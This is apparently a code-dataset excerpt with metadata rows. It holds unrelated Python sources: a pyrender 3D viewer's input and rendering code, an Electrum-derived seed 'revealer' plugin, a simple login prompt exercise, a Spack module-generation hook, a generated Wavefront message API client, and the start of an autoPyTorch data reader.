self._renderer.render_text(
caption['text'],
xpos,
ypos,
font_name=caption['font_name'],
font_pt=caption['font_pt'],
color=caption['color'],
scale=caption['scale'],
align=caption['location']
)
if self.run_in_thread:
self.render_lock.release()
def on_resize(self, width, height):
"""Resize the camera and trackball when the window is resized.
"""
if self._renderer is None:
return
self._viewport_size = (width, height)
self._trackball.resize(self._viewport_size)
self._renderer.viewport_width = self._viewport_size[0]
self._renderer.viewport_height = self._viewport_size[1]
self.on_draw()
def on_mouse_press(self, x, y, buttons, modifiers):
"""Record an initial mouse press.
"""
self._trackball.set_state(Trackball.STATE_ROTATE)
if (buttons == pyglet.window.mouse.LEFT):
ctrl = (modifiers & pyglet.window.key.MOD_CTRL)
shift = (modifiers & pyglet.window.key.MOD_SHIFT)
if (ctrl and shift):
self._trackball.set_state(Trackball.STATE_ZOOM)
elif ctrl:
self._trackball.set_state(Trackball.STATE_ROLL)
elif shift:
self._trackball.set_state(Trackball.STATE_PAN)
elif (buttons == pyglet.window.mouse.MIDDLE):
self._trackball.set_state(Trackball.STATE_PAN)
elif (buttons == pyglet.window.mouse.RIGHT):
self._trackball.set_state(Trackball.STATE_ZOOM)
self._trackball.down(np.array([x, y]))
# Stop animating while using the mouse
self.viewer_flags['mouse_pressed'] = True
def on_mouse_drag(self, x, y, dx, dy, buttons, modifiers):
"""Record a mouse drag.
"""
self._trackball.drag(np.array([x, y]))
def on_mouse_release(self, x, y, button, modifiers):
"""Record a mouse release.
"""
self.viewer_flags['mouse_pressed'] = False
def on_mouse_scroll(self, x, y, dx, dy):
"""Record a mouse scroll.
"""
if self.viewer_flags['use_perspective_cam']:
self._trackball.scroll(dy)
else:
spfc = 0.95
spbc = 1.0 / 0.95
sf = 1.0
if dy > 0:
sf = spfc * dy
elif dy < 0:
sf = - spbc * dy
c = self._camera_node.camera
xmag = max(c.xmag * sf, 1e-8)
ymag = max(c.ymag * sf, 1e-8 * c.ymag / c.xmag)
c.xmag = xmag
c.ymag = ymag
def on_key_press(self, symbol, modifiers):
"""Record a key press.
"""
# First, check for registered key callbacks
if symbol in self.registered_keys:
tup = self.registered_keys[symbol]
callback = None
args = []
kwargs = {}
if not isinstance(tup, (list, tuple, np.ndarray)):
callback = tup
else:
callback = tup[0]
if len(tup) == 2:
args = tup[1]
if len(tup) == 3:
kwargs = tup[2]
callback(self, *args, **kwargs)
return
# Otherwise, use default key functions
# A causes the frame to rotate
self._message_text = None
if symbol == pyglet.window.key.A:
self.viewer_flags['rotate'] = not self.viewer_flags['rotate']
if self.viewer_flags['rotate']:
self._message_text = 'Rotation On'
else:
self._message_text = 'Rotation Off'
# C toggles backface culling
elif symbol == pyglet.window.key.C:
self.render_flags['cull_faces'] = (
not self.render_flags['cull_faces']
)
if self.render_flags['cull_faces']:
self._message_text = 'Cull Faces On'
else:
self._message_text = 'Cull Faces Off'
        # F toggles fullscreen mode
elif symbol == pyglet.window.key.F:
self.viewer_flags['fullscreen'] = (
not self.viewer_flags['fullscreen']
)
self.set_fullscreen(self.viewer_flags['fullscreen'])
self.activate()
if self.viewer_flags['fullscreen']:
self._message_text = 'Fullscreen On'
else:
self._message_text = 'Fullscreen Off'
        # H toggles shadow rendering (not supported on macOS)
elif symbol == pyglet.window.key.H and sys.platform != 'darwin':
self.render_flags['shadows'] = not self.render_flags['shadows']
if self.render_flags['shadows']:
self._message_text = 'Shadows On'
else:
self._message_text = 'Shadows Off'
        # I cycles through axis display modes
        elif symbol == pyglet.window.key.I:
if (self.viewer_flags['show_world_axis'] and not
self.viewer_flags['show_mesh_axes']):
self.viewer_flags['show_world_axis'] = False
self.viewer_flags['show_mesh_axes'] = True
self._set_axes(False, True)
self._message_text = 'Mesh Axes On'
elif (not self.viewer_flags['show_world_axis'] and
self.viewer_flags['show_mesh_axes']):
self.viewer_flags['show_world_axis'] = True
self.viewer_flags['show_mesh_axes'] = True
self._set_axes(True, True)
self._message_text = 'All Axes On'
elif (self.viewer_flags['show_world_axis'] and
self.viewer_flags['show_mesh_axes']):
self.viewer_flags['show_world_axis'] = False
self.viewer_flags['show_mesh_axes'] = False
self._set_axes(False, False)
self._message_text = 'All Axes Off'
else:
self.viewer_flags['show_world_axis'] = True
self.viewer_flags['show_mesh_axes'] = False
self._set_axes(True, False)
self._message_text = 'World Axis On'
# L toggles the lighting mode
elif symbol == pyglet.window.key.L:
if self.viewer_flags['use_raymond_lighting']:
self.viewer_flags['use_raymond_lighting'] = False
self.viewer_flags['use_direct_lighting'] = True
self._message_text = 'Direct Lighting'
elif self.viewer_flags['use_direct_lighting']:
self.viewer_flags['use_raymond_lighting'] = False
self.viewer_flags['use_direct_lighting'] = False
self._message_text = 'Default Lighting'
else:
self.viewer_flags['use_raymond_lighting'] = True
self.viewer_flags['use_direct_lighting'] = False
self._message_text = 'Raymond Lighting'
# M toggles face normals
elif symbol == pyglet.window.key.M:
self.render_flags['face_normals'] = (
not self.render_flags['face_normals']
)
if self.render_flags['face_normals']:
self._message_text = 'Face Normals On'
else:
self._message_text = 'Face Normals Off'
# N toggles vertex normals
elif symbol == pyglet.window.key.N:
self.render_flags['vertex_normals'] = (
not self.render_flags['vertex_normals']
)
if self.render_flags['vertex_normals']:
self._message_text = 'Vert Normals On'
else:
self._message_text = 'Vert Normals Off'
# O toggles orthographic camera mode
elif symbol == pyglet.window.key.O:
self.viewer_flags['use_perspective_cam'] = (
not self.viewer_flags['use_perspective_cam']
)
if self.viewer_flags['use_perspective_cam']:
camera = self._default_persp_cam
self._message_text = 'Perspective View'
else:
camera = self._default_orth_cam
self._message_text = 'Orthographic View'
cam_pose = self._camera_node.matrix.copy()
cam_node = Node(matrix=cam_pose, camera=camera)
self.scene.remove_node(self._camera_node)
self.scene.add_node(cam_node)
self.scene.main_camera_node = cam_node
self._camera_node = cam_node
# Q quits the viewer
elif symbol == pyglet.window.key.Q:
self.on_close()
# R starts recording frames
elif symbol == pyglet.window.key.R:
if self.viewer_flags['record']:
self.save_gif()
self.set_caption(self.viewer_flags['window_title'])
else:
self.set_caption(
'{} (RECORDING)'.format(self.viewer_flags['window_title'])
)
self.viewer_flags['record'] = not self.viewer_flags['record']
# S saves the current frame as an image
elif symbol == pyglet.window.key.S:
self._save_image()
# W toggles through wireframe modes
elif symbol == pyglet.window.key.W:
if self.render_flags['flip_wireframe']:
self.render_flags['flip_wireframe'] = False
self.render_flags['all_wireframe'] = True
self.render_flags['all_solid'] = False
self._message_text = 'All Wireframe'
elif self.render_flags['all_wireframe']:
self.render_flags['flip_wireframe'] = False
self.render_flags['all_wireframe'] = False
self.render_flags['all_solid'] = True
self._message_text = 'All Solid'
elif self.render_flags['all_solid']:
self.render_flags['flip_wireframe'] = False
self.render_flags['all_wireframe'] = False
self.render_flags['all_solid'] = False
self._message_text = 'Default Wireframe'
else:
self.render_flags['flip_wireframe'] = True
self.render_flags['all_wireframe'] = False
self.render_flags['all_solid'] = False
self._message_text = 'Flip Wireframe'
# Z resets the camera viewpoint
elif symbol == pyglet.window.key.Z:
self._reset_view()
if self._message_text is not None:
self._message_opac = 1.0 + self._ticks_till_fade
@staticmethod
def _time_event(dt, self):
"""The timer callback.
"""
# Don't run old dead events after we've already closed
if not self._is_active:
return
if self.viewer_flags['record']:
self._record()
if (self.viewer_flags['rotate'] and not
self.viewer_flags['mouse_pressed']):
self._rotate()
# Manage message opacity
if self._message_text is not None:
if self._message_opac > 1.0:
self._message_opac -= 1.0
else:
self._message_opac *= 0.90
if self._message_opac < 0.05:
self._message_opac = 1.0 + self._ticks_till_fade
self._message_text = None
if self._should_close:
self.on_close()
else:
self.on_draw()
def _reset_view(self):
"""Reset the view to a good initial state.
The view is initially along the positive x-axis at a
sufficient distance from the scene.
"""
scale = self.scene.scale
if scale == 0.0:
scale = DEFAULT_SCENE_SCALE
centroid = self.scene.centroid
if self.viewer_flags['view_center'] is not None:
centroid = self.viewer_flags['view_center']
self._camera_node.matrix = self._default_camera_pose
self._trackball = Trackball(
self._default_camera_pose, self.viewport_size, scale, centroid
)
def _get_save_filename(self, file_exts):
file_types = {
'png': ('png files', '*.png'),
'jpg': ('jpeg files', '*.jpg'),
'gif': ('gif files', '*.gif'),
'all': ('all files', '*'),
}
filetypes = [file_types[x] for x in file_exts]
try:
root = Tk()
save_dir = self.viewer_flags['save_directory']
if save_dir is None:
save_dir = os.getcwd()
filename = filedialog.asksaveasfilename(
initialdir=save_dir, title='Select file save location',
filetypes=filetypes
)
except Exception:
return None
root.destroy()
if filename == ():
return None
return filename
def _save_image(self):
filename = self._get_save_filename(['png', 'jpg', 'gif', 'all'])
if filename is not None:
self.viewer_flags['save_directory'] = os.path.dirname(filename)
imageio.imwrite(filename, self._renderer.read_color_buf())
def _record(self):
"""Save another frame for the GIF.
"""
data = self._renderer.read_color_buf()
if not np.all(data == 0.0):
self._saved_frames.append(data)
def _rotate(self):
"""Animate the scene by rotating the camera.
"""
az = (self.viewer_flags['rotate_rate'] /
self.viewer_flags['refresh_rate'])
self._trackball.rotate(az, self.viewer_flags['rotate_axis'])
def _render(self):
"""Render the scene into the framebuffer and flip.
"""
scene = self.scene
self._camera_node.matrix = self._trackball.pose.copy()
# Set lighting
vli = self.viewer_flags['lighting_intensity']
if self.viewer_flags['use_raymond_lighting']:
for n in self._raymond_lights:
n.light.intensity = vli / 3.0
if not self.scene.has_node(n):
scene.add_node(n, parent_node=self._camera_node)
else:
self._direct_light.light.intensity = vli
for n in self._raymond_lights:
if self.scene.has_node(n):
self.scene.remove_node(n)
if self.viewer_flags['use_direct_lighting']:
if not self.scene.has_node(self._direct_light):
scene.add_node(
self._direct_light, parent_node=self._camera_node
)
elif self.scene.has_node(self._direct_light):
self.scene.remove_node(self._direct_light)
flags = RenderFlags.NONE
if self.render_flags['flip_wireframe']:
flags |= RenderFlags.FLIP_WIREFRAME
elif self.render_flags['all_wireframe']:
flags |= RenderFlags.ALL_WIREFRAME
elif self.render_flags['all_solid']:
flags |= RenderFlags.ALL_SOLID
if self.render_flags['shadows']:
flags |= RenderFlags.SHADOWS_DIRECTIONAL | RenderFlags.SHADOWS_SPOT
if self.render_flags['vertex_normals']:
flags |= RenderFlags.VERTEX_NORMALS
if self.render_flags['face_normals']:
flags |= RenderFlags.FACE_NORMALS
if not self.render_flags['cull_faces']:
flags |= RenderFlags.SKIP_CULL_FACES
self._renderer.render(self.scene, flags)
def _init_and_start_app(self):
from pyglet.gl import Config
conf = Config(sample_buffers=1, samples=4,
depth_size=24, double_buffer=True,
major_version=OPEN_GL_MAJOR,
minor_version=OPEN_GL_MINOR)
super(Viewer, self).__init__(config=conf, resizable=True,
width=self._viewport_size[0],
height=self._viewport_size[1])
if self.context.config.major_version < 3:
raise ValueError('Unable to initialize an OpenGL 3+ context')
clock.schedule_interval(
Viewer._time_event, 1.0 / self.viewer_flags['refresh_rate'], self
)
self.switch_to()
self.set_caption(self.viewer_flags['window_title'])
pyglet.app.run()
def _compute_initial_camera_pose(self):
centroid = self.scene.centroid
if self.viewer_flags['view_center'] is not None:
centroid = self.viewer_flags['view_center']
scale = self.scene.scale
if scale == 0.0:
scale = DEFAULT_SCENE_SCALE
s2 = 1.0 / np.sqrt(2.0)
cp = np.eye(4)
cp[:3,:3] = np.array([
[0.0, -s2, s2],
[1.0, 0.0, 0.0],
[0.0, s2, s2]
])
hfov = np.pi / 6.0
dist = scale / (2.0 * np.tan(hfov))
cp[:3,3] = dist * np.array([1.0, 0.0, 1.0]) + centroid
return cp
def _create_raymond_lights(self):
thetas = np.pi * np.array([1.0 / 6.0, 1.0 / 6.0, 1.0 / 6.0])
phis = np.pi * np.array([0.0, 2.0 / 3.0, 4.0 / 3.0])
nodes = []
for phi, theta in zip(phis, thetas):
xp = np.sin(theta) * np.cos(phi)
yp = np.sin(theta) * np.sin(phi)
zp = np.cos(theta)
z = np.array([xp, yp, zp])
z = z / np.linalg.norm(z)
x = np.array([-z[1], z[0], 0.0])
if np.linalg.norm(x) == 0:
x = np.array([1.0, 0.0, 0.0])
x = x / np.linalg.norm(x)
y = np.cross(z, x)
matrix = np.eye(4)
matrix[:3,:3] = np.c_[x,y,z]
nodes.append(Node(
light=DirectionalLight(color=np.ones(3), intensity=1.0),
matrix=matrix
))
return nodes
def _create_direct_light(self):
light = DirectionalLight(color=np.ones(3), intensity=1.0)
n = Node(light=light, matrix=np.eye(4))
return n
def _set_axes(self, world, mesh):
scale = self.scene.scale
if world:
if 'scene' not in self._axes:
n = Node(mesh=self._axis_mesh, scale=np.ones(3) * scale * 0.3)
self.scene.add_node(n)
self._axes['scene'] = n
else:
if 'scene' in self._axes:
self.scene.remove_node(self._axes['scene'])
self._axes.pop('scene')
if mesh:
old_nodes = []
existing_axes = set([self._axes[k] for k in self._axes])
for node in self.scene.mesh_nodes:
if node not in existing_axes:
old_nodes.append(node)
for node in old_nodes:
if node in self._axes:
continue
n = Node(
mesh=self._axis_mesh,
scale=np.ones(3) * node.mesh.scale * 0.5
)
self.scene.add_node(n, parent_node=node)
self._axes[node] = n
else:
to_remove = set()
for main_node in self._axes:
if main_node in self.scene.mesh_nodes:
self.scene.remove_node(self._axes[main_node])
to_remove.add(main_node)
for main_node in to_remove:
self._axes.pop(main_node)
def _remove_axes(self):
for main_node in self._axes:
axis_node = self._axes[main_node]
self.scene.remove_node(axis_node)
self._axes = {}
def _location_to_x_y(self, location):
if location == TextAlign.CENTER:
return (self.viewport_size[0] / 2.0, self.viewport_size[1] / 2.0)
elif location == TextAlign.CENTER_LEFT:
return (TEXT_PADDING, self.viewport_size[1] / 2.0)
elif location == TextAlign.CENTER_RIGHT:
return (self.viewport_size[0] - TEXT_PADDING,
self.viewport_size[1] / 2.0)
elif location == TextAlign.BOTTOM_LEFT:
return (TEXT_PADDING, TEXT_PADDING)
elif location == TextAlign.BOTTOM_RIGHT:
return (self.viewport_size[0] - TEXT_PADDING, TEXT_PADDING)
elif location == TextAlign.BOTTOM_CENTER:
return (self.viewport_size[0] / 2.0, TEXT_PADDING)
elif location == TextAlign.TOP_LEFT:
return (TEXT_PADDING, self.viewport_size[1] - TEXT_PADDING)
elif location == TextAlign.TOP_RIGHT:
return (self.viewport_size[0] - TEXT_PADDING,
self.viewport_size[1] - TEXT_PADDING)
elif location == TextAlign.TOP_CENTER:
return (self.viewport_size[0] / 2.0,
self.viewport_size[1] - TEXT_PADDING)
__all__ = ['Viewer']
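A hedged sketch of the threaded-animation pattern described in the class docstring (``run_in_thread`` plus ``render_lock``). It is written as a standalone script: the package-level imports and the icosphere mesh are assumptions for illustration, not part of this module.

if __name__ == '__main__':
    import time
    import numpy as np
    import trimesh
    from pyrender import Mesh, Scene, Viewer

    scene = Scene()
    mesh_node = scene.add(Mesh.from_trimesh(trimesh.creation.icosphere()))
    viewer = Viewer(scene, run_in_thread=True, use_raymond_lighting=True)

    pose = np.eye(4)
    while viewer.is_active:
        pose[0, 3] += 0.001           # nudge the mesh along +x each tick
        viewer.render_lock.acquire()  # pause rendering while mutating the scene
        scene.set_pose(mesh_node, pose)
        viewer.render_lock.release()
        time.sleep(1.0 / 30.0)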
| 38.202834
| 88
| 0.571399
|
5f7e13a979805a3a5ace82b752da0eec596f6153
| 3,561
|
py
|
Python
|
electrumsys/plugins/revealer/revealer.py
|
syscoin/electrum
|
ac576539c758640ff87ed6be1311eb57b57d205f
|
[
"MIT"
] | 1
|
2019-06-26T16:51:43.000Z
|
2019-06-26T16:51:43.000Z
|
electrumsys/plugins/revealer/revealer.py
|
syscoin/electrumsys
|
ac576539c758640ff87ed6be1311eb57b57d205f
|
[
"MIT"
] | null | null | null |
electrumsys/plugins/revealer/revealer.py
|
syscoin/electrumsys
|
ac576539c758640ff87ed6be1311eb57b57d205f
|
[
"MIT"
] | 1
|
2018-09-10T21:43:02.000Z
|
2018-09-10T21:43:02.000Z
|
import random
import os
from hashlib import sha256
from typing import NamedTuple, Optional, Dict, Tuple
from electrumsys.plugin import BasePlugin
from electrumsys.util import to_bytes, bh2u, bfh
from .hmac_drbg import DRBG
class VersionedSeed(NamedTuple):
version: str
seed: str
checksum: str
def get_ui_string_version_plus_seed(self):
version, seed = self.version, self.seed
assert isinstance(version, str) and len(version) == 1, version
assert isinstance(seed, str) and len(seed) >= 32
ret = version + seed
ret = ret.upper()
return ' '.join(ret[i : i+4] for i in range(0, len(ret), 4))
class RevealerPlugin(BasePlugin):
LATEST_VERSION = '1'
KNOWN_VERSIONS = ('0', '1')
assert LATEST_VERSION in KNOWN_VERSIONS
SIZE = (159, 97)
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
@classmethod
def code_hashid(cls, txt: str) -> str:
txt = txt.lower()
x = to_bytes(txt, 'utf8')
hash = sha256(x).hexdigest()
return hash[-3:].upper()
@classmethod
def get_versioned_seed_from_user_input(cls, txt: str) -> Optional[VersionedSeed]:
if len(txt) < 34:
return None
try:
int(txt, 16)
except:
return None
version = txt[0]
if version not in cls.KNOWN_VERSIONS:
return None
checksum = cls.code_hashid(txt[:-3])
if txt[-3:].upper() != checksum.upper():
return None
return VersionedSeed(version=version.upper(),
seed=txt[1:-3].upper(),
checksum=checksum.upper())
@classmethod
def get_noise_map(cls, versioned_seed: VersionedSeed) -> Dict[Tuple[int, int], int]:
"""Returns a map from (x,y) coordinate to pixel value 0/1, to be used as rawnoise."""
w, h = cls.SIZE
version = versioned_seed.version
hex_seed = versioned_seed.seed
checksum = versioned_seed.checksum
noise_map = {}
if version == '0':
random.seed(int(hex_seed, 16))
for x in range(w):
for y in range(h):
noise_map[(x, y)] = random.randint(0, 1)
elif version == '1':
prng_seed = bfh(hex_seed + version + checksum)
drbg = DRBG(prng_seed)
num_noise_bytes = 1929 # ~ w*h
noise_array = bin(int.from_bytes(drbg.generate(num_noise_bytes), 'big'))[2:]
# there's an approx 1/1024 chance that the generated number is 'too small'
# and we would get IndexError below. easiest backwards compat fix:
noise_array += '0' * (w * h - len(noise_array))
i = 0
for x in range(w):
for y in range(h):
noise_map[(x, y)] = int(noise_array[i])
i += 1
else:
raise Exception(f"unexpected revealer version: {version}")
return noise_map
@classmethod
def gen_random_versioned_seed(cls):
version = cls.LATEST_VERSION
hex_seed = bh2u(os.urandom(16))
checksum = cls.code_hashid(version + hex_seed)
return VersionedSeed(version=version.upper(),
seed=hex_seed.upper(),
checksum=checksum.upper())
if __name__ == '__main__':
for i in range(10**4):
vs = RevealerPlugin.gen_random_versioned_seed()
nm = RevealerPlugin.get_noise_map(vs)
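A hedged round-trip sketch for the seed format handled above: generate a seed, render it the way the plugin's UI string helper does, and parse the de-spaced string back. Only methods defined in this file are used; the snippet itself is illustrative.

# Standalone round-trip check (illustrative only).
vs = RevealerPlugin.gen_random_versioned_seed()
ui_string = vs.get_ui_string_version_plus_seed()   # e.g. '1A2B 3C4D ...'
parsed = RevealerPlugin.get_versioned_seed_from_user_input(ui_string.replace(' ', ''))
assert parsed == vs
noise = RevealerPlugin.get_noise_map(parsed)       # dict keyed by (x, y) pixel coords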
| 33.59434
| 93
| 0.579051
|
8e7a5dfda3473634172982b58de10cc83690024c
| 265
|
py
|
Python
|
topicos/10_strings/respostas/LoginValido.py
|
erosvitor/curso-python-fundamentos
|
daf113f08f724f6e7a92977799c76f49a021e5bd
|
[
"MIT"
] | null | null | null |
topicos/10_strings/respostas/LoginValido.py
|
erosvitor/curso-python-fundamentos
|
daf113f08f724f6e7a92977799c76f49a021e5bd
|
[
"MIT"
] | null | null | null |
topicos/10_strings/respostas/LoginValido.py
|
erosvitor/curso-python-fundamentos
|
daf113f08f724f6e7a92977799c76f49a021e5bd
|
[
"MIT"
] | null | null | null |
#!python3
print("Login")
print("")
loginValido = False
while not loginValido:
login = input("Digite o login: ")
if login.strip():
print("Login válido.")
loginValido = True
else:
print("Login inválido, tente novamente.")
loginValido = False
| 16.5625
| 45
| 0.656604
|
363654efc40d7ca4613b8d9352eb6dfea0b4c779
| 1,018
|
py
|
Python
|
lib/spack/spack/hooks/module_file_generation.py
|
kkauder/spack
|
6ae8d5c380c1f42094b05d38be26b03650aafb39
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2
|
2019-02-10T13:47:48.000Z
|
2019-04-17T13:05:17.000Z
|
lib/spack/spack/hooks/module_file_generation.py
|
kkauder/spack
|
6ae8d5c380c1f42094b05d38be26b03650aafb39
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 17
|
2019-03-21T15:54:00.000Z
|
2022-03-29T19:34:28.000Z
|
lib/spack/spack/hooks/module_file_generation.py
|
kkauder/spack
|
6ae8d5c380c1f42094b05d38be26b03650aafb39
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2
|
2021-04-07T18:27:09.000Z
|
2022-03-31T22:52:38.000Z
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import spack.config
import spack.modules
import spack.modules.common
import llnl.util.tty as tty
def _for_each_enabled(spec, method_name):
"""Calls a method for each enabled module"""
enabled = spack.config.get('modules:enable')
if not enabled:
tty.debug('NO MODULE WRITTEN: list of enabled module files is empty')
return
for name in enabled:
generator = spack.modules.module_types[name](spec)
try:
getattr(generator, method_name)()
except RuntimeError as e:
msg = 'cannot perform the requested {0} operation on module files'
msg += ' [{1}]'
tty.warn(msg.format(method_name, str(e)))
def post_install(spec):
_for_each_enabled(spec, 'write')
def post_uninstall(spec):
_for_each_enabled(spec, 'remove')
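The hook above is a small dispatch-with-soft-failure pattern: look up each enabled module generator, call one method on it, and downgrade errors to warnings. A hedged, Spack-free sketch of the same shape (every name below is invented for illustration):

import logging

GENERATORS = {}  # hypothetical registry: name -> callable(spec) -> writer object

def for_each_enabled(enabled_names, spec, method_name):
    """Call method_name on every enabled generator, warning instead of failing."""
    for name in enabled_names:
        generator = GENERATORS[name](spec)
        try:
            getattr(generator, method_name)()
        except RuntimeError as exc:
            logging.warning('cannot perform %s on module files [%s]', method_name, exc)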
| 29.085714
| 78
| 0.682711
|
2999593581b7b885aa192f7b9b50013fd436c1c3
| 8,536
|
py
|
Python
|
wavefront_api_client/api/message_api.py
|
PowerOlive/python-client
|
eebda67381fcf893914c309103878236b609a70b
|
[
"Apache-2.0"
] | 11
|
2016-05-30T17:16:45.000Z
|
2021-06-11T19:32:59.000Z
|
wavefront_api_client/api/message_api.py
|
PowerOlive/python-client
|
eebda67381fcf893914c309103878236b609a70b
|
[
"Apache-2.0"
] | 25
|
2016-05-02T23:05:19.000Z
|
2020-11-18T22:43:20.000Z
|
wavefront_api_client/api/message_api.py
|
PowerOlive/python-client
|
eebda67381fcf893914c309103878236b609a70b
|
[
"Apache-2.0"
] | 30
|
2016-04-29T17:17:11.000Z
|
2022-02-11T04:58:37.000Z
|
# coding: utf-8
"""
Wavefront REST API
<p>The Wavefront REST API enables you to interact with Wavefront servers using standard REST API tools. You can use the REST API to automate commonly executed operations such as automatically tagging sources.</p><p>When you make REST API calls outside the Wavefront REST API documentation you must add the header \"Authorization: Bearer <<API-TOKEN>>\" to your HTTP requests.</p> # noqa: E501
OpenAPI spec version: v2
Contact: chitimba@wavefront.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from wavefront_api_client.api_client import ApiClient
class MessageApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def user_get_messages(self, **kwargs): # noqa: E501
"""Gets messages applicable to the current user, i.e. within time range and distribution scope # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.user_get_messages(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset:
:param int limit:
:param bool unread_only:
:return: ResponseContainerPagedMessage
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.user_get_messages_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.user_get_messages_with_http_info(**kwargs) # noqa: E501
return data
def user_get_messages_with_http_info(self, **kwargs): # noqa: E501
"""Gets messages applicable to the current user, i.e. within time range and distribution scope # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.user_get_messages_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset:
:param int limit:
:param bool unread_only:
:return: ResponseContainerPagedMessage
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['offset', 'limit', 'unread_only'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method user_get_messages" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'unread_only' in params:
query_params.append(('unreadOnly', params['unread_only'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/message', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerPagedMessage', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def user_read_message(self, id, **kwargs): # noqa: E501
"""Mark a specific message as read # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.user_read_message(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: ResponseContainerMessage
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.user_read_message_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.user_read_message_with_http_info(id, **kwargs) # noqa: E501
return data
def user_read_message_with_http_info(self, id, **kwargs): # noqa: E501
"""Mark a specific message as read # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.user_read_message_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: ResponseContainerMessage
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method user_read_message" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `user_read_message`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/message/{id}/read', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerMessage', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
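A hedged usage sketch for the generated API class above. The `Configuration`/`ApiClient` bootstrap follows the usual swagger-codegen layout that this package ships with, but the host value, token, and response field names are placeholders to verify against the installed `wavefront_api_client`.

# Illustrative wiring of MessageApi against a Wavefront cluster (placeholders only).
import wavefront_api_client

config = wavefront_api_client.Configuration()
config.host = 'https://YOUR_CLUSTER.wavefront.com'
client = wavefront_api_client.ApiClient(
    configuration=config,
    header_name='Authorization',
    header_value='Bearer YOUR_API_TOKEN')

api = MessageApi(api_client=client)
page = api.user_get_messages(limit=10, unread_only=True)
print(page)  # ResponseContainerPagedMessage; the paged items live under its response attribute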
| 37.275109
| 409
| 0.611176
|
5d7d7d85d2ad50b3d2d4ca0dca49023644f7a13a
| 9,663
|
py
|
Python
|
autoPyTorch/data_management/data_reader.py
|
urbanmatthias/Auto-PyTorch
|
fe7c51b33c48041e405ef2975ee691c0539691ab
|
[
"BSD-3-Clause"
] | 1
|
2019-11-19T12:22:46.000Z
|
2019-11-19T12:22:46.000Z
|
autoPyTorch/data_management/data_reader.py
|
gaohuan2015/Auto-PyTorch
|
3c6bf7e051b32284d2655cc484aee1a8c982c04e
|
[
"Apache-2.0"
] | null | null | null |
autoPyTorch/data_management/data_reader.py
|
gaohuan2015/Auto-PyTorch
|
3c6bf7e051b32284d2655cc484aee1a8c982c04e
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import print_function, division
import pandas as pd
import numpy as np
from abc import abstractmethod
import os
from scipy.sparse import csr_matrix
import math
from autoPyTorch.data_management.data_converter import DataConverter
__author__ = "Max Dippel, Michael Burkart and Matthias Urban"
__version__ = "0.0.1"
__license__ = "BSD"
class DataReader(object):
